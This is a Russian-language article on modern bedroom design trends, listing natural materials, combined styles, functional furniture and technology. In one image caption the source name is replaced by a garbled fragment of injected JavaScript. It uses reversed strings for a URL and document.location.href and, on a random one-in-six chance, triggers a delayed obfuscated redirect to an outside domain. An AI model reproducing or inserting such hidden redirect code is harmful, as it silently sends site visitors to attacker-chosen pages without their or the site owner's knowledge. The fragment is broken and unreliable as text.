Добавить в закладки

3 современных тенденций дизайна спальни

Многие из нас хотели бы идти в ногу со временем и быть современным во всех планах, как в жизни так и в дизайне своего жилища. В этой статье мы с вами разберем, несколько тенденций современности в дизайне спален.

Тенденция последних лет — это натуральные тона и только натуральные экологические материалы — дерево и мрамор, лен и шелк. Разнообразие стилей и разнообразие вариантов внутренней отделки спален в современном стиле, которые воплощены дизайнерами, заставляют горожан страдать от выбора стилей для спальни.

Поскольку это место в доме является чем-то очень личным и уникальным, интерьер должен быть не только стильным и стильным, но и учитывать индивидуальность владельцев.

Современна спальня в стиле современной Франции. Источник: mydizajn.ru

Само понятие «современная спальня» нельзя отнести ни к какому стилю, но в то же время дизайнеры подчеркивают отличительные черты интерьера, особенно его создания. Современный номер — это сочетание комфорта, тепла и практичности с обязательным учетом моды и модных тенденций.

Единственное правило, которому вы должны следовать и не забывать: «Весь образ должен быть объединен», поэтому требуется совместимость материалов и гармония стилей.

Современная спальня. Источник: cozyblog.ru

Если вы хотите выбрать идеальный стиль номера, идеально подойдет Прованс или Викторианец. В целом, стиль не ограничивает, основными критериями современного помещения являются:

  1. Удобная, функциональная и практичная мебель.
  2. Сочетание в оформлении элементов разных стилей.
  3. Использование преимущественно натуральных материалов.
  4. Использование технических инноваций.

Белоснежная спальня. Источник: stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torge.pic2.me

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 09.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: